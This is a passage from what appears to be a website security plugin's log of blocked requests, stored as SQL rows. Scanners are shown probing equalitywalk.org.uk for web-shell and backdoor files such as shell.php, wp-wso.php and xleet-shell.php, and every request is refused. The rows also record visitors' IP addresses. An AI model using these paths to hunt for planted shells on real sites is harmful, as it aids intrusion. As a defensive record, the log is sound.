Safari\\/537.36\",\"2\":\"www.google.com\"}','OBJmTL2nVSGM7sUp5a4zjw0c',0,1673924484.1318,11426,'','POST',403,0,700,0,1,'',0),('142.93.103.165',2388486053,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','HvbDW4h2rSMgK5CieF6JlkwU',0,1673924501.1520,403,'','GET',403,0,700,0,1,'',0),('142.93.103.165',2388486053,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','1SKk2bzcugQaPLNdUTGCslDp',0,1673924501.7042,149,'','GET',403,0,700,0,1,'',0),('62.221.197.174',1054721454,'','https://www.equalitywalk.org.uk/wp-includes/versions.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','z4DhWBYg2FIPbA3MElZ80Ump',0,1673928095.7360,129,'','POST',403,0,700,0,1,'',0),('92.204.239.168',1556934568,'','https://www.equalitywalk.org.uk/wp-includes/versions.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','We8ijXo9pG73nBCsUQh2cryd',0,1673928095.8532,161,'','POST',403,0,700,0,1,'',0),('62.221.197.174',1054721454,'','https://www.equalitywalk.org.uk/wp-admin/assets/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Buej21sG63Ok8PTdbLmRFCfS',0,1673928095.9184,106,'','GET',403,0,700,0,1,'',0),('92.204.239.168',1556934568,'','https://www.equalitywalk.org.uk/wp-admin/assets/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','2iULR4AWpStBHXs90hjk7T6N',0,1673928096.1173,103,'','GET',403,0,700,0,1,'',0),('62.221.197.174',1054721454,'','https://www.equalitywalk.org.uk/wp-includes/fonts/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','wBlIpfDEWFxQXHS9Udcg7yuR',0,1673928096.1906,103,'','GET',403,0,700,0,1,'',0),('62.221.197.174',1054721454,'','https://www.equalitywalk.org.uk/wp-includes/js/thickbox/themes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','hdE5cCpmqJQy17Wg6RNHuGv2',0,1673928096.4545,125,'','GET',403,0,700,0,1,'',0),('92.204.239.168',1556934568,'','https://www.equalitywalk.org.uk/wp-includes/fonts/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','3X0GZsHW6av9wPTj1h4SzBUD',0,1673928096.6391,127,'','GET',403,0,700,0,1,'',0),('92.204.239.168',1556934568,'','https://www.equalitywalk.org.uk/wp-includes/js/thickbox/themes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','53ObERGac4ChPoSp8Y6XqFuQ',0,1673928096.8310,93,'','GET',403,0,700,0,1,'',0),('91.134.248.245',1535572213,'','https://equalitywalk.org.uk/atomlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/atomlib.php\"}','dqYtMrzc3m5Z7h0LExyuGo1S',0,1673931680.6372,97,'','GET',403,0,700,0,1,'',0),('91.199.118.51',1539798579,'','https://www.equalitywalk.org.uk/style.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','tCI0moa14Yg2lQwEBpP8Mc3H',0,1673932691.1164,98,'','GET',403,0,700,0,1,'',0),('91.199.118.51',1539798579,'','https://www.equalitywalk.org.uk/wp-admin/style.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','o3gDHCFYGvB8E5SjpNZtrJl7',0,1673932691.7374,115,'','GET',403,0,700,0,1,'',0),('91.199.118.51',1539798579,'','https://www.equalitywalk.org.uk/s_e.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','WNCYj5JivGOqREwFVMrhP09k',0,1673932692.7843,107,'','GET',403,0,700,0,1,'',0),('91.199.118.51',1539798579,'','https://www.equalitywalk.org.uk/s_ne.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','msDS4Yq2kR8pyVdaJ51ntbTZ',0,1673932693.8595,112,'','GET',403,0,700,0,1,'',0),('91.199.118.51',1539798579,'','https://www.equalitywalk.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','O9MvkSeWUhYBKCV0J1GIEs5N',0,1673932695.1981,94,'','GET',403,0,700,0,1,'',0),('91.199.118.51',1539798579,'','https://www.equalitywalk.org.uk/radio.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','dpuwBQXEzPqTe6CVL70xivrb',0,1673932753.0296,191,'','GET',403,0,700,0,1,'',0),('91.199.118.51',1539798579,'','https://www.equalitywalk.org.uk/doc.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','xdZqRs0rSDF9mhaBzfinMAL5',0,1673932755.0805,99,'','GET',403,0,700,0,1,'',0),('91.199.118.51',1539798579,'','https://www.equalitywalk.org.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','13RkcDJdTEMus6eCfp8OWF27',0,1673932760.6605,114,'','GET',403,0,700,0,1,'',0),('91.199.118.51',1539798579,'','https://www.equalitywalk.org.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','2ljeczvgiuqa1JPY9WmypBkw',0,1673932762.2259,146,'','GET',403,0,700,0,1,'',0),('91.199.118.51',1539798579,'','https://www.equalitywalk.org.uk/ups.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','xHDf8NEGIvbceJSVuP1trwLM',0,1673932799.5026,109,'','GET',403,0,700,0,1,'',0),('91.239.157.179',1542430131,'','https://www.equalitywalk.org.uk/wp-signin.php?dizo&ping','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','9m5NKYabtTJZwQDxvRBzqfg3',0,1673932937.3867,135,'','GET',403,0,700,0,1,'',0),('91.239.157.179',1542430131,'','https://www.equalitywalk.org.uk/media-admin.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','mTfYHiOELFWSwV8hase4BxZq',0,1673933035.8087,137,'','GET',403,0,700,0,1,'',0),('91.239.157.219',1542430171,'','https://www.equalitywalk.org.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','rcFNQaZ71PkJEBSWI4gpjxM0',0,1673933161.9225,101,'','GET',403,0,700,0,1,'',0),('91.239.157.219',1542430171,'','https://www.equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','DrEtpViw74NHLs2uB3gQMbeU',0,1673933297.4130,132,'','GET',403,0,700,0,1,'',0),('91.239.157.219',1542430171,'','https://www.equalitywalk.org.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','WtFl4AmyDM5UiTLaKpojVcfh',0,1673933363.7751,118,'','GET',403,0,700,0,1,'',0),('91.239.157.219',1542430171,'','https://www.equalitywalk.org.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','oBxakMdXbyfVAvnYZ08ElwUQ',0,1673933387.5467,131,'','GET',403,0,700,0,1,'',0),('91.238.82.83',1542345299,'','https://www.equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','AhE34xsQ78o1qbujNVcpWwtX',0,1673933460.9940,118,'','GET',403,0,700,0,1,'',0),('91.238.82.83',1542345299,'','https://www.equalitywalk.org.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','7FYuPLe136QndKUMfEc9J0Tm',0,1673933501.1120,134,'','GET',403,0,700,0,1,'',0),('91.238.82.83',1542345299,'','https://www.equalitywalk.org.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','Za83GTinryBfXROd0k6UH2o1',0,1673933610.3984,106,'','GET',403,0,700,0,1,'',0),('91.238.82.83',1542345299,'','https://www.equalitywalk.org.uk/wp-booking.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','OU9xuSr2Ab1J5fIBRTNqzHoQ',0,1673933634.3590,106,'','GET',403,0,700,0,1,'',0),('91.238.82.83',1542345299,'','https://www.equalitywalk.org.uk/config.bak.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','ItRYdkV78PiMaA3lLrjhfUx9',0,1673933719.3769,119,'','GET',403,0,700,0,1,'',0),('91.238.82.83',1542345299,'','https://www.equalitywalk.org.uk/legion.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','o5bjUimfphCK01YqDMlsPeBN',0,1673933720.8318,149,'','GET',403,0,700,0,1,'',0),('91.238.82.83',1542345299,'','https://www.equalitywalk.org.uk/wp-plugins.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','oN2zc7CysE6d30e1vJ9GnwTi',0,1673933722.8939,122,'','GET',403,0,700,0,1,'',0),('162.241.149.165',2733741477,'','https://equalitywalk.org.uk/atomlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/atomlib.php\"}','gtNOh73knRjDZTXLGwvA1f2d',0,1673934274.1164,144,'','GET',403,0,700,0,1,'',0),('91.134.248.192',1535572160,'','https://equalitywalk.org.uk/wp-admin/network/trike.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-admin\\/network\\/trike.php\"}','2nThVGe0gUHOLXypCaluQr5d',0,1673940424.6464,806,'','GET',403,0,700,0,1,'',0),('192.185.81.125',3233370493,'','https://equalitywalk.org.uk/wp-config-samsples.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-config-samsples.php\"}','gieNy4GRcLuOTXx3lUE8aohp',0,1673944532.6936,139,'','GET',403,0,700,0,1,'',0),('92.205.18.157',1556943517,'','https://equalitywalk.org.uk/moon.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/moon.php\"}','lRFH6032axhDrcCVswj47t1d',0,1673947200.3299,122,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/stindex.php','','{\"1\":\"python-requests\\/2.28.1\"}','o9PjYv3tuqWp1VGTZl2B6isb',0,1673949386.5841,934,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/stindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','sjOZyKwVRzW09cLvFAX3M8Jk',0,1673949388.9140,185,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/3.php','','{\"1\":\"python-requests\\/2.28.1\"}','jkIdFrg8YnJuqDyA7ZLHo3zM',0,1673949391.6802,112,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','jMCURAE4JZzcHvGmXVN36uto',0,1673949391.9697,132,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','gUG9OuCe6Qxc8trXBZ7kNA41',0,1673949397.6332,152,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/sym.php','','{\"1\":\"python-requests\\/2.28.1\"}','hA1fCmTPEY95wLZtbKi724Qn',0,1673949397.6853,179,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','iqG0aKoRVMBlZHFr48UcIuhx',0,1673949398.4093,111,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','6IBYZ8TkzesCRGMNvapotE2W',0,1673949398.5367,107,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','h7I1QLXonsc6dt3bJVA9uG2Y',0,1673949429.8640,141,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','O36tewsXJEMPTVoiYShaAc7H',0,1673949434.1155,101,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/o.php','','{\"1\":\"python-requests\\/2.28.1\"}','39HaeX6ugSQif8ZATEbWhsGC',0,1673949443.9296,124,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-info.php','','{\"1\":\"python-requests\\/2.28.1\"}','dCP7IZyczqMu8ETQ4S1fsVn9',0,1673949443.9579,106,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.28.1\"}','5TiseQDpjWAEl8wKaumZH3OJ',0,1673949443.9587,106,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/sym403.php','','{\"1\":\"python-requests\\/2.28.1\"}','NZQ0c6iYmCHv23ea9PkODTLI',0,1673949444.0625,104,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-admin/maint/about.php','','{\"1\":\"python-requests\\/2.28.1\"}','6nMDLr3zN2xCtjuEl5Vfm7RA',0,1673949444.0837,104,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/s.php','','{\"1\":\"python-requests\\/2.28.1\"}','V9pu8y2KNogPsLhaCSGc3wIY',0,1673949444.1474,104,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/0byte.php','','{\"1\":\"python-requests\\/2.28.1\"}','DiEokJA3gQdRS24tbazFcrqH',0,1673949444.2423,126,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','EaHmOJ2NnBzCe7IodfjyrwAZ',0,1673949444.2700,121,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ywMimQ2SkUXH0nrVcqWZOlDC',0,1673949444.3147,97,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','4ZehFEsA9PvkOJD8rxB3uybT',0,1673949444.4800,101,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-admin/maint/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','sacO6Z2lAnPgdIm81o7UStwx',0,1673949444.4963,93,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-info.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','TU1jY87oVPlDnLeN3IRti9dK',0,1673949444.4813,135,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','vWyfrtXI7EJSbpTYCPBDgGV9',0,1673949444.6041,100,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','601XxmeCrckK58LvNAs4HzdV',0,1673949444.6406,95,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/u.php','','{\"1\":\"python-requests\\/2.28.1\"}','AGjzJu4WdEV8sRgyeaiqS76H',0,1673949444.6463,91,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/0.php','','{\"1\":\"python-requests\\/2.28.1\"}','G8VFWUKLjhl73X91vbqiCHTR',0,1673949444.8253,93,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/r.php','','{\"1\":\"python-requests\\/2.28.1\"}','0GIs7NqQVL1n2phyxJit8MZe',0,1673949444.8307,98,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/ne.php','','{\"1\":\"python-requests\\/2.28.1\"}','isVZ420SC3dUywoHNrRlFgxa',0,1673949445.1174,120,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/y.php','','{\"1\":\"python-requests\\/2.28.1\"}','MFekwbJD9PoGQ1l4gBS5rRNU',0,1673949445.1207,116,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-wso.php','','{\"1\":\"python-requests\\/2.28.1\"}','6UqXdtsfDz29H5RjJkCLYVF8',0,1673949445.0894,148,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Pm8Ksf0vDF3pdtOxiSYLyZqT',0,1673949445.1190,138,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','EIkABTf1RZduWhCOMVv2XJl3',0,1673949445.9865,95,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','8UlmGW9rzMnLyDdKIOB6XZve',0,1673949446.7248,99,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','O4cP06KRLmBCw81yonVvA3Qp',0,1673949447.0140,108,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','6vDHmY1X2s9gijW3MVFyGzkp',0,1673949447.4671,94,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/ne.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','2mzOtDxpwAqd56fbFQZCva09',0,1673949447.6347,89,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/Uploader.php','','{\"1\":\"python-requests\\/2.28.1\"}','cOQHTUimawzPoqfbKydFMtZ9',0,1673949487.4790,166,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/Uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','INdm4gTMRVqXtiBSYLojvkFH',0,1673949488.4879,107,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/1.php','','{\"1\":\"python-requests\\/2.28.1\"}','gheaiPAVTMnk8Y3oOHF9Xxm0',0,1673949497.9284,139,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/1975.php','','{\"1\":\"python-requests\\/2.28.1\"}','z3QfuRA8wXKFBPOG4htb6qMn',0,1673949497.9465,220,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/1975.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','V8iYtKpmnJfTrSIQNxhWo7aP',0,1673949499.0229,97,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','5sLCdJ7VvPuKR8Tgh2AzrBUy',0,1673949499.8173,103,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/2.php','','{\"1\":\"python-requests\\/2.28.1\"}','C5oMQG7jkdWRa9vKshcfUVDg',0,1673949511.8802,153,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','MJm58bz2EUvBjVXnxSP19R7a',0,1673949514.7839,110,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/xleet-shell.php','','{\"1\":\"python-requests\\/2.28.1\"}','oGaFVNQ3SwHWInfeh2MxbKE5',0,1673949533.1539,128,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/403.php','','{\"1\":\"python-requests\\/2.28.1\"}','4flazB3k9HmAvJSh6cLTnsKg',0,1673949533.2380,103,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/i.php','','{\"1\":\"python-requests\\/2.28.1\"}','WSlt29NimrRJUu854exgBE70',0,1673949533.4964,115,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/xleet-shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','HpOLR1IA0ytxiVsPF32lUNwD',0,1673949533.6550,108,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','xqpSTnBAZPIVKk1Yy6GoFtMm',0,1673949533.9582,96,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','qTAElkvBwauI3pJKPScUrbn9',0,1673949534.4716,89,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/x.php','','{\"1\":\"python-requests\\/2.28.1\"}','cGkHfpdrOviAtXYTe7V19Dj2',0,1673949557.4842,118,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','iGsb2XCZcLAFjaVe6BoJR37z',0,1673949558.2665,242,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-load.php','','{\"1\":\"python-requests\\/2.28.1\"}','ulNyedJVqx0QK6oYwzPkXtT7',0,1673949584.9326,128,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 